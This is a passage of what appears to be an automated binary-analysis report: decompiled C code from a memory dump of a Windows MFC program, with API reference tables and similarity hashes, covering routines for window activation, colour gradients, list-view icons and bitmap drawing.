							}
							SetForegroundWindow( *( *(_t65 - 0x14) + 0x20));
							L004268D6();
							 *(_t65 - 4) = 0;
							L004268D0();
						}
						UnmapViewOfFile(_t59);
						CloseHandle( *(_t65 - 0x10));
						 *(_t65 - 4) =  *(_t65 - 4) | 0xffffffff;
						L004268CA();
						_t31 = _t64;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t65 - 0xc));
				return _t31;
			}

APIs

_EH_prolog.MSVCRT ref: 00420562
OpenFileMappingA.KERNEL32 ref: 00420584
#800.MFC42 ref: 00420590
MapViewOfFile.KERNEL32(?,00000006,00000000,00000000,00000004), ref: 004205A7
#521.MFC42(?,00000001), ref: 004205C0
#567.MFC42(?,00000001), ref: 004205D1
#1651.MFC42(?,?,00000001), ref: 004205DE
GetLastActivePopup.USER32(?), ref: 004205E6
#2864.MFC42(00000000,?,?,00000001), ref: 004205ED
IsIconic.USER32 ref: 004205F8
#6215.MFC42(00000009,?,?,00000001), ref: 00420607
SetForegroundWindow.USER32(?,?,?,00000001), ref: 00420612
#2463.MFC42(?,?,00000001), ref: 0042061B
#818.MFC42(?,?,00000001), ref: 00420626
UnmapViewOfFile.KERNEL32(00000000,?,00000001), ref: 0042062C
CloseHandle.KERNEL32(?,?,00000001), ref: 00420635
#6307.MFC42(?,00000001), ref: 00420642
CloseHandle.KERNEL32(?), ref: 0042064E

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CloseHandleView$#1651#2463#2864#521#567#6215#6307#800#818ActiveForegroundH_prologIconicLastMappingOpenPopupUnmapWindow
String ID:
API String ID: 3886814232-0
Opcode ID: f87ebf4b96e2d96be54a102e2650845be0e192c4422b7eab9782532cde148556
Instruction ID: 75aea4897b8cf0d81a3aa35148170f79d419c9aa26246351e534bf8a8c0c8969
Opcode Fuzzy Hash: f87ebf4b96e2d96be54a102e2650845be0e192c4422b7eab9782532cde148556
Instruction Fuzzy Hash: E0316E75A001299FCB14EFA0ED49AAEBB75FF45344F51006AF512A32A1CB784E04CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00401370, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 181
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E00401370(signed int __fp0) {
				unsigned int _t90;
				signed int _t93;
				unsigned int _t97;
				unsigned int _t98;
				unsigned int _t99;
				signed int _t100;
				signed char _t104;
				unsigned int _t113;
				unsigned int _t114;
				signed int _t116;
				signed int _t117;
				signed int _t123;
				unsigned int _t126;
				unsigned int _t131;
				signed int _t132;
				signed int _t140;
				intOrPtr _t141;
				signed int _t144;
				signed int _t145;
				unsigned int _t148;
				intOrPtr _t150;
				void* _t151;
				signed int _t169;
				signed long long _t171;
				signed long long _t173;
				signed long long _t175;
				signed long long _t177;

				_t169 = __fp0;
				L004269E6();
				if( *(_t151 + 0x1c) == 0xffffffff) {
					 *(_t151 + 0x1c) =  *(_t151 + 0x14);
				}
				_t90 =  *(_t151 + 0xc);
				_t131 =  *(_t151 + 0x10);
				_t117 = _t90 & 0x000000ff;
				 *(_t151 - 0x2c) = _t117;
				_t140 = (_t131 & 0x000000ff) - _t117;
				 *(_t151 - 0x10) = _t140;
				_t144 = _t90 & 0x000000ff;
				 *(_t151 - 0x24) = _t144;
				_t123 = (_t131 & 0x000000ff) - _t144;
				_t132 = _t131 >> 0x10;
				_t145 = _t90 >> 0x00000010 & 0x000000ff;
				_t93 = (_t132 & 0x000000ff) - _t145;
				 *(_t151 - 0x1c) = _t145;
				 *(_t151 - 0x18) = _t93;
				 *(_t151 - 0x14) = _t123;
				asm("cdq");
				_t148 = (_t93 ^ _t132) - _t132;
				asm("cdq");
				_t126 = (_t123 ^ _t132) - _t132;
				_t113 = _t126;
				if(_t126 <= _t148) {
					_t113 = _t148;
				}
				asm("cdq");
				_t97 = (_t140 ^ _t132) - _t132;
				if(_t97 <= _t113) {
					 *(_t151 + 0xc) = _t126;
					if(_t126 <= _t148) {
						 *(_t151 + 0xc) = _t148;
					}
				} else {
					 *(_t151 + 0xc) = _t97;
				}
				_t98 =  *(_t151 + 0x20);
				if( *(_t151 + 0xc) >= _t98) {
					 *(_t151 + 0xc) = _t98;
				}
				_t99 =  *(_t151 + 0x14);
				if(_t99 <  *(_t151 + 0xc)) {
					 *(_t151 + 0xc) = _t99;
				}
				_t114 = 0;
				if( *(_t151 + 0xc) == 0) {
					 *(_t151 + 0xc) = 1;
				}
				_t100 =  *(_t151 + 0xc);
				 *(_t151 - 0x30) = _t114;
				 *(_t151 - 0x34) = _t100;
				asm("fild qword [ebp-0x34]");
				 *(_t151 - 0x30) = _t114;
				 *(_t151 - 0x34) = 0x42e55c;
				 *(_t151 + 0x10) = _t169;
				asm("fild dword [ebp-0x10]");
				 *(_t151 + 0x20) = _t169;
				_t171 =  *(_t151 + 0x20) /  *(_t151 + 0x10);
				 *(_t151 - 0x28) = _t171;
				asm("fild dword [ebp-0x14]");
				 *(_t151 + 0x20) = _t171;
				_t173 =  *(_t151 + 0x20) /  *(_t151 + 0x10);
				 *((intOrPtr*)(_t151 - 0x20)) = _t173;
				asm("fild dword [ebp-0x18]");
				 *(_t151 + 0x20) = _t173;
				_t175 =  *(_t151 + 0x20) /  *(_t151 + 0x10);
				 *(_t151 - 0x14) = _t175;
				asm("fild dword [ebp+0x14]");
				 *(_t151 + 0x20) = _t175;
				_t177 =  *(_t151 + 0x20) /  *(_t151 + 0x10);
				 *(_t151 - 0x10) = _t177;
				_t141 = 0;
				 *(_t151 - 4) = _t114;
				if(_t100 > _t114) {
					while(1) {
						 *((intOrPtr*)(_t151 - 0x3c)) = _t141;
						 *(_t151 - 0x38) = _t114;
						asm("fild qword [ebp-0x3c]");
						 *(_t151 + 0x10) = _t177;
						L00426A3C();
						_t51 = _t141 + 1; // 0x1
						_t150 = _t51;
						 *(_t151 - 0x40) = _t114;
						 *((intOrPtr*)(_t151 - 0x44)) = _t150;
						 *(_t151 + 0x20) = _t100;
						asm("fild qword [ebp-0x44]");
						 *(_t151 - 0x18) =  *(_t151 + 0x10) *  *(_t151 - 0x10);
						_t177 =  *(_t151 - 0x18) *  *(_t151 - 0x10);
						L00426A3C();
						_t116 = _t100;
						if(_t141 ==  *(_t151 + 0xc) - 1) {
							_t116 =  *(_t151 + 0x14);
						}
						_t100 =  *(_t151 + 0x18);
						if(_t116 < _t100) {
							goto L26;
						}
						if( *(_t151 + 0x20) < _t100) {
							 *(_t151 + 0x20) = _t100;
						}
						if(_t116 >  *(_t151 + 0x1c)) {
							_t116 =  *(_t151 + 0x1c);
						}
						L00426A3C();
						 *(_t151 - 0x18) = 0;
						L00426A3C();
						_t104 = _t100 +  *(_t151 - 0x1c) +  *(_t151 - 0x24);
						_t177 =  *(_t151 + 0x10) *  *(_t151 - 0x28);
						 *(_t151 + 0x10) = _t104 << 8;
						L00426A3C();
						 *(_t151 - 0x4c) = _t104 +  *(_t151 - 0x2c) & 0x000000ff |  *(_t151 + 0x10);
						 *((intOrPtr*)(_t151 - 0x48)) = _t116 -  *(_t151 + 0x20);
						_t100 = L00401BC2( *((intOrPtr*)(_t151 + 8)), _t151 - 0x4c);
						if(_t116 <  *(_t151 + 0x1c)) {
							goto L26;
						}
						goto L27;
						L26:
						_t141 = _t150;
						if(_t141 <  *(_t151 + 0xc)) {
							_t114 = 0;
							continue;
						}
						goto L27;
					}
				}
				L27:
				 *(_t151 - 0x34) = 0x42c514;
				 *(_t151 - 4) = 1;
				L00425FA6();
				 *[fs:0x0] =  *((intOrPtr*)(_t151 - 0xc));
				return _t100;
			}

0x00401370
0x0041c77a
0x0041c786
0x0041c78b
0x0041c78b
0x0041c78e
0x0041c791
0x0041c797
0x0041c79d
0x0041c7a0
0x0041c7a4
0x0041c7a9
0x0041c7ae
0x0041c7b9
0x0041c7bb
0x0041c7be
0x0041c7c4
0x0041c7c6
0x0041c7c9
0x0041c7cc
0x0041c7cf
0x0041c7d6
0x0041c7d8
0x0041c7dd
0x0041c7e1
0x0041c7e3
0x0041c7e5
0x0041c7e5
0x0041c7e9
0x0041c7ec
0x0041c7f0
0x0041c7f9
0x0041c7fc
0x0041c7fe
0x0041c7fe
0x0041c7f2
0x0041c7f2
0x0041c7f2
0x0041c801
0x0041c807
0x0041c809
0x0041c809
0x0041c80c
0x0041c812
0x0041c814
0x0041c814
0x0041c817
0x0041c81c
0x0041c81e
0x0041c81e
0x0041c825
0x0041c828
0x0041c82b
0x0041c82e
0x0041c831
0x0041c834
0x0041c83b
0x0041c83e
0x0041c841
0x0041c847
0x0041c84a
0x0041c84d
0x0041c850
0x0041c856
0x0041c859
0x0041c85c
0x0041c85f
0x0041c865
0x0041c868
0x0041c86b
0x0041c86e
0x0041c874
0x0041c877
0x0041c87a
0x0041c87e
0x0041c881
0x0041c88b
0x0041c88b
0x0041c88e
0x0041c891
0x0041c894
0x0041c89d
0x0041c8a2
0x0041c8a2
0x0041c8a5
0x0041c8a8
0x0041c8ab
0x0041c8ae
0x0041c8b1
0x0041c8b7
0x0041c8ba
0x0041c8bf
0x0041c8c7
0x0041c8c9
0x0041c8c9
0x0041c8cc
0x0041c8d1
0x00000000
0x00000000
0x0041c8d6
0x0041c8d8
0x0041c8d8
0x0041c8de
0x0041c8e0
0x0041c8e0
0x0041c8e9
0x0041c8fb
0x0041c8fe
0x0041c903
0x0041c90c
0x0041c914
0x0041c917
0x0041c92a
0x0041c932
0x0041c939
0x0041c941
0x00000000
0x00000000
0x00000000
0x0041c943
0x0041c943
0x0041c948
0x0041c889
0x00000000
0x0041c889
0x00000000
0x0041c948
0x0041c88b
0x0041c94e
0x0041c94e
0x0041c958
0x0041c95f
0x0041c96a
0x0041c972

APIs

_EH_prolog.MSVCRT ref: 0041C77A
_ftol.MSVCRT ref: 0041C89D
_ftol.MSVCRT ref: 0041C8BA
_ftol.MSVCRT ref: 0041C8E9
_ftol.MSVCRT ref: 0041C8FE
_ftol.MSVCRT ref: 0041C917
#2414.MFC42 ref: 0041C95F

Strings

\B, xrefs: 0041C834

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: _ftol$#2414H_prolog
String ID: \B
API String ID: 1936294815-2993081821
Opcode ID: eed4cd09981fbee29af2e94b677008e9a623c00c581d9a88fdd501c40c755522
Instruction ID: 0bfe0fe7fcdac8e3d4d2dc907848cd9e4c35ebc2b713da2603c336ad65c3a3be
Opcode Fuzzy Hash: eed4cd09981fbee29af2e94b677008e9a623c00c581d9a88fdd501c40c755522
Instruction Fuzzy Hash: DC711A71A0025ADFCF04DFA9D9C80EEBBB1FF48304F52852AE865A7241C33899A5CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00402270, Relevance: 121.0, APIs: 68, Strings: 1, Instructions: 258
windowCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00402270(void* __ecx, void* __edi, void* __ebp, int _a4, intOrPtr _a12, void* _a16, intOrPtr _a20) {
				void* _v8;
				intOrPtr _v12;
				void* _v32;
				intOrPtr _v36;
				void* _v200;
				int _v212;
				char _v220;
				char _v224;
				long _t78;
				int _t82;
				signed int _t83;
				int _t84;
				void* _t106;
				void* _t109;

				L004269E6();
				_push(__ecx);
				_push(_t83);
				_push(_a20);
				_t106 = __ecx;
				L0042600C();
				_t84 = _t83 | 0xffffffff;
				if(E00427E91 != _t84) {
					L00425E08();
					_a4 = 0;
					SendMessageA( *(__ecx + 0x20), 0x1036, 0, 0x22);
					_push(0x8053);
					L00425E02();
					_push(_t84);
					_push(0x82);
					_push(0);
					_push(_a12);
					_push(0);
					L00426006();
					_push(0x8062);
					L00425E02();
					_push(_t84);
					_push(0x64);
					_push(0);
					_push(_v12);
					_t109 = 1;
					_push(_t109);
					L00426006();
					_push(0x8054);
					L00425E02();
					_push(_t84);
					_push(0xf0);
					_push(0);
					_push(_v36);
					_push(2);
					L00426006();
					_push(_t109);
					_push(_t109);
					_push(_t109);
					_push(0x10);
					_push(0x10);
					L00426000();
					L00425E44();
					_push(0x9b);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x9b, 0x9b));
					L00425E44();
					_push(0x9a);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x9a, 0x9a));
					L00425E44();
					_push(0x9d);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x9d, 0x9d));
					L00425E44();
					_push(0x90);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x90, 0x90));
					L00425E44();
					_push(0x91);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x91, 0x91));
					L00425E44();
					_push(0x92);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x92, 0x92));
					L00425E44();
					_push(0x93);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x93, 0x93));
					L00425E44();
					_push(0x94);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x94, 0x94));
					L00425E44();
					_push(0x95);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x95, 0x95));
					L00425E44();
					_push(0x96);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x96, 0x96));
					L00425E44();
					_push(0x97);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x97, 0x97));
					L00425E44();
					_push(0x98);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x98, 0x98));
					L00425E44();
					_push(0x99);
					_push(0xe);
					L00425FFA();
					ImageList_ReplaceIcon( *(_t106 + 0x98), _t84, LoadIconA(0x99, 0x99));
					_t78 = _t106 + 0x94;
					if(_t78 != 0) {
						_t78 =  *(_t78 + 4);
					}
					_push(SendMessageA( *(_t106 + 0x20), 0x1003, 1, _t78));
					L00425FF4();
					_push("CClientPrivateComView");
					L00425FB8();
					_v212 = 1;
					_push( &_v224);
					_push(_t106);
					E00401672( &_v220);
					_v212 = _v212 & 0x00000000;
					L00425DFC();
					_v212 = _t84;
					L00425DFC();
					_t82 = 0;
				} else {
					_t82 = _t84;
				}
				 *[fs:0x0] = _v220;
				return _t82;
			}

APIs

_EH_prolog.MSVCRT ref: 0040899D
#4464.MFC42(?), ref: 004089AB
#540.MFC42(?,?,?), ref: 004089C4
SendMessageA.USER32 ref: 004089DA
#4160.MFC42(00008053,?,?,?), ref: 004089E9
#3996.MFC42(00000000,?,00000000,00000082,?,00008053,?,?,?), ref: 004089FC
#4160.MFC42(00008062,00000000,?,00000000,00000082,?,00008053,?,?,?), ref: 00408A0A
#3996.MFC42(00000001,?,00000000,00000064,?,00008062,00000000,?,00000000,00000082,?,00008053,?,?,?), ref: 00408A1D
#4160.MFC42(00008054,00000001,?,00000000,00000064,?,00008062,00000000,?,00000000,00000082,?,00008053,?,?,?), ref: 00408A2B
#3996.MFC42(00000002,?,00000000,000000F0,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000,?,00000000,00000082), ref: 00408A3F
#2096.MFC42(00000010,00000010,00000001,00000001,00000001,00000002,?,00000000,000000F0,?,00008054,00000001,?,00000000,00000064), ref: 00408A51
#1168.MFC42(00000010,00000010,00000001,00000001,00000001,00000002,?,00000000,000000F0,?,00008054,00000001,?,00000000,00000064), ref: 00408A56
#1146.MFC42(0000009B,0000000E,0000009B,00000010,00000010,00000001,00000001,00000001,00000002,?,00000000,000000F0,?,00008054,00000001,?), ref: 00408A64
LoadIconA.USER32(00000000,0000009B), ref: 00408A70
ImageList_ReplaceIcon.COMCTL32(?,?,00000000,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000,?,00000000,00000082), ref: 00408A80
#1168.MFC42(?,00000000,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000,?,00000000,00000082,?,00008053), ref: 00408A82
#1146.MFC42(0000009A,0000000E,0000009A,?,00000000,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000,?,00000000), ref: 00408A90
LoadIconA.USER32(00000000,0000009A), ref: 00408A96
ImageList_ReplaceIcon.COMCTL32(?,?,00000000,?,00000000,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000,?,00000000), ref: 00408AA0
#1168.MFC42(?,00000000,?,00000000,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000,?,00000000,00000082), ref: 00408AA2
#1146.MFC42(0000009D,0000000E,0000009D,?,00000000,?,00000000,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000), ref: 00408AB0
LoadIconA.USER32(00000000,0000009D), ref: 00408AB6
ImageList_ReplaceIcon.COMCTL32(?,?,00000000,?,00000000,?,00000000,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000), ref: 00408AC0
#1168.MFC42(?,00000000,?,00000000,?,00000000,?,00008054,00000001,?,00000000,00000064,?,00008062,00000000,?), ref: 00408AC2
#1146.MFC42(00000090,0000000E,00000090,?,00000000,?,00000000,?,00000000,?,00008054,00000001,?,00000000,00000064), ref: 00408AD0
LoadIconA.USER32(00000000,00000090), ref: 00408AD6
ImageList_ReplaceIcon.COMCTL32(?,?,00000000,?,00000000,?,00000000,?,00000000,?,00008054,00000001,?,00000000,00000064), ref: 00408AE0

Strings

CClientPrivateComView, xrefs: 00408C28

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Icon$#1146#1168ImageList_LoadReplace$#3996#4160$#2096#4464#540H_prologMessageSend
String ID: CClientPrivateComView
API String ID: 2633976754-357165002
Opcode ID: 2654458665075024b785df32ab24b5ab52f7fdc9e37f328d90315570f3812a19
Instruction ID: 0d80e276c68ff244314dfab922e621cbbde45c390e1637522de048af2a1b5d4b
Opcode Fuzzy Hash: 2654458665075024b785df32ab24b5ab52f7fdc9e37f328d90315570f3812a19
Instruction Fuzzy Hash: 4B717EB03047587EFA20B772ED46F6B755DEF40708F41481EB58AA65E2CDBCDD448628

Uniqueness

Uniqueness Score: -1.00%

Function 00401762, Relevance: 87.8, APIs: 47, Strings: 3, Instructions: 279
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00401762(void* __eflags) {
				signed int _t127;
				intOrPtr _t129;
				intOrPtr _t130;
				int _t147;
				signed int _t175;
				intOrPtr _t176;
				intOrPtr _t177;
				int _t210;
				void* _t218;

				L004269E6();
				L004264B0();
				_t210 = 0;
				 *(_t218 - 4) = 0;
				_push(CreateCompatibleDC(0));
				L004264AA();
				L00401974(_t218 - 0x18);
				 *(_t218 - 0x18) = 0x42e34c;
				_t6 = _t218 + 0x18; // 0x42e34c
				 *(_t218 - 4) = 1;
				_push(CreateCompatibleBitmap( *(_t218 - 0x44),  *(_t218 + 0x14),  *_t6));
				L004264BC();
				asm("sbb eax, eax");
				_t127 =  ~(_t218 - 0x18) &  *(_t218 - 0x14);
				_push(_t127);
				_push( *(_t218 - 0x44));
				L00426540();
				 *(_t218 - 0x10) = _t127;
				L004264B0();
				 *(_t218 - 4) = 2;
				_push(CreateCompatibleDC(0));
				L004264AA();
				_t129 =  *((intOrPtr*)(_t218 + 0x1c));
				if(_t129 != 0) {
					_t130 =  *((intOrPtr*)(_t129 + 4));
				} else {
					_t130 = 0;
				}
				_push(_t130);
				_push( *(_t218 - 0x34));
				L00426540();
				 *((intOrPtr*)(_t218 + 0x1c)) = _t130;
				PatBlt( *(_t218 - 0x44), _t210, _t210,  *(_t218 + 0x14),  *(_t218 + 0x18), 0xff0062);
				_push(GetSysColor(0xf));
				L00426678();
				asm("sbb eax, eax");
				BitBlt( *(_t218 - 0x44), _t210, _t210,  *(_t218 + 0x14),  *(_t218 + 0x18),  ~(_t218 - 0x38) &  *(_t218 - 0x34),  *(_t218 + 0x20),  *(_t218 + 0x24), 0xcc0020);
				_push(GetSysColor(0x14));
				L00426678();
				asm("sbb eax, eax");
				BitBlt( *(_t218 - 0x44), _t210, _t210,  *(_t218 + 0x14),  *(_t218 + 0x18),  ~(_t218 - 0x38) &  *(_t218 - 0x34),  *(_t218 + 0x20),  *(_t218 + 0x24), 0xee0086);
				_push( *((intOrPtr*)(_t218 + 0x28)));
				_push( *(_t218 + 0x18));
				_push( *(_t218 + 0x14));
				_push(_t210);
				_push(_t210);
				L0042671A();
				_push(_t210);
				L00426678();
				_push(0xffffff);
				L00426672();
				 *(_t218 - 0x24) = _t210;
				 *((intOrPtr*)(_t218 - 0x28)) = 0x42e55c;
				 *(_t218 - 0x1c) = _t210;
				 *(_t218 - 0x20) = 0x42e55c;
				 *(_t218 - 4) = 4;
				_push(CreateSolidBrush(GetSysColor(0x14)));
				L004264BC();
				_push(CreateSolidBrush(GetSysColor(0x10)));
				L004264BC();
				_t147 = _t218 - 0x20;
				_push(_t147);
				L00426570();
				 *(_t218 + 0x24) = _t147;
				asm("sbb eax, eax");
				BitBlt( *(_t218 - 0x34), _t210, _t210,  *(_t218 + 0x14),  *(_t218 + 0x18),  ~(_t218 - 0x48) &  *(_t218 - 0x44), _t210, _t210, 0xe20746);
				asm("sbb eax, eax");
				BitBlt( *( *((intOrPtr*)(_t218 + 8)) + 4),  *(_t218 + 0xc) + 1,  *(_t218 + 0x10) + 1,  *(_t218 + 0x14),  *(_t218 + 0x18),  ~(_t218 - 0x38) &  *(_t218 - 0x34), _t210, _t210, 0xcc0020);
				asm("sbb eax, eax");
				BitBlt( *(_t218 - 0x34), 1, 1,  *(_t218 + 0x14),  *(_t218 + 0x18),  ~(_t218 - 0x48) &  *(_t218 - 0x44), _t210, _t210, 0xe20746);
				_push(_t218 - 0x28);
				L00426570();
				asm("sbb eax, eax");
				BitBlt( *(_t218 - 0x34), _t210, _t210,  *(_t218 + 0x14),  *(_t218 + 0x18),  ~(_t218 - 0x48) &  *(_t218 - 0x44), _t210, _t210, 0xe20746);
				asm("sbb eax, eax");
				BitBlt( *( *((intOrPtr*)(_t218 + 8)) + 4),  *(_t218 + 0xc),  *(_t218 + 0x10),  *(_t218 + 0x14),  *(_t218 + 0x18),  ~(_t218 - 0x38) &  *(_t218 - 0x34), _t210, _t210, 0xcc0020);
				_t175 =  *(_t218 - 0x10);
				if(_t175 != _t210) {
					_t176 =  *((intOrPtr*)(_t175 + 4));
				} else {
					_t176 = 0;
				}
				_push(_t176);
				_push( *(_t218 - 0x44));
				L00426540();
				L004264A4();
				_push( *(_t218 + 0x24));
				L00426570();
				_t177 =  *((intOrPtr*)(_t218 + 0x1c));
				if(_t177 != _t210) {
					_t210 =  *(_t177 + 4);
				}
				_push(_t210);
				_push( *(_t218 - 0x34));
				L00426540();
				L004264A4();
				L00425FA6();
				L00425FA6();
				L00425FA6();
				 *(_t218 - 0x20) = 0x42c514;
				 *(_t218 - 4) = 5;
				L00425FA6();
				 *((intOrPtr*)(_t218 - 0x28)) = 0x42c514;
				 *(_t218 - 0x20) = 0x42c4fc;
				 *(_t218 - 4) = 6;
				L00425FA6();
				 *((intOrPtr*)(_t218 - 0x28)) = 0x42c4fc;
				 *(_t218 - 4) = 1;
				L0042649E();
				 *(_t218 - 0x18) = 0x42c514;
				 *(_t218 - 4) = 7;
				L00425FA6();
				 *(_t218 - 4) =  *(_t218 - 4) | 0xffffffff;
				 *(_t218 - 0x18) = 0x42c4fc;
				L0042649E();
				 *[fs:0x0] =  *((intOrPtr*)(_t218 - 0xc));
				return _t177;
			}

APIs

_EH_prolog.MSVCRT ref: 00417986
#323.MFC42 ref: 00417993
CreateCompatibleDC.GDI32(00000000), ref: 004179A4
#1640.MFC42(00000000), ref: 004179AA
CreateCompatibleBitmap.GDI32(?,?,LB), ref: 004179CB
#1641.MFC42(00000000), ref: 004179D5
#5785.MFC42(?,?,00000000), ref: 004179E8
#323.MFC42(?,?,00000000), ref: 004179F3
CreateCompatibleDC.GDI32(00000000), ref: 004179FD
#1640.MFC42(00000000), ref: 00417A03
#5785.MFC42(?,00000002,?,00000000), ref: 00417A1B
PatBlt.GDI32(?,00000000,00000000,?,0042E34C,00FF0062), ref: 00417A33
GetSysColor.USER32(0000000F), ref: 00417A41
#5873.MFC42(00000000,?,00000000), ref: 00417A47
BitBlt.GDI32(?,00000000,00000000,?,0042E34C,?,?,?,00CC0020), ref: 00417A73
GetSysColor.USER32(00000014), ref: 00417A77
#5873.MFC42(00000000,?,00000000), ref: 00417A7D
BitBlt.GDI32(?,00000000,00000000,?,0042E34C,?,?,?,00EE0086), ref: 00417AA3
#2753.MFC42(00000000,00000000,?,0042E34C,?,?,00000000), ref: 00417AB3
#5873.MFC42(00000000,00000000,00000000,?,0042E34C,?,?,00000000), ref: 00417ABC
#6172.MFC42(00FFFFFF,00000000,00000000,00000000,?,0042E34C,?,?,00000000), ref: 00417AC9
GetSysColor.USER32(00000014), ref: 00417AE5
CreateSolidBrush.GDI32(00000000), ref: 00417AE8
#1641.MFC42(00000000,?,00000000), ref: 00417AF2
GetSysColor.USER32(00000010), ref: 00417AF9
CreateSolidBrush.GDI32(00000000), ref: 00417AFC
#1641.MFC42(00000000,?,00000000), ref: 00417B06
#5787.MFC42(?,00000000,?,00000000), ref: 00417B12
BitBlt.GDI32(?,00000000,00000000,?,0042E34C,?,00000000,00000000,00E20746), ref: 00417B38
BitBlt.GDI32(00000004,?,?,?,0042E34C,?,00000000,00000000,00CC0020), ref: 00417B62
BitBlt.GDI32(?,00000001,00000001,?,0042E34C,?,00000000,00000000,00E20746), ref: 00417B7F
#5787.MFC42(?,?,00000000), ref: 00417B88
BitBlt.GDI32(?,00000000,00000000,?,0042E34C,?,00000000,00000000,00E20746), ref: 00417BA6
BitBlt.GDI32(00000004,?,?,?,0042E34C,?,00000000,00000000,00CC0020), ref: 00417BCC
#5785.MFC42(?,00000004,00000000), ref: 00417BE1
#2405.MFC42(?,00000004,00000000), ref: 00417BE9
#5787.MFC42(?,?,00000004,00000000), ref: 00417BF4
#5785.MFC42(?,00000000,?,?,00000004,00000000), ref: 00417C07
#2405.MFC42(?,00000000,?,?,00000004,00000000), ref: 00417C0F
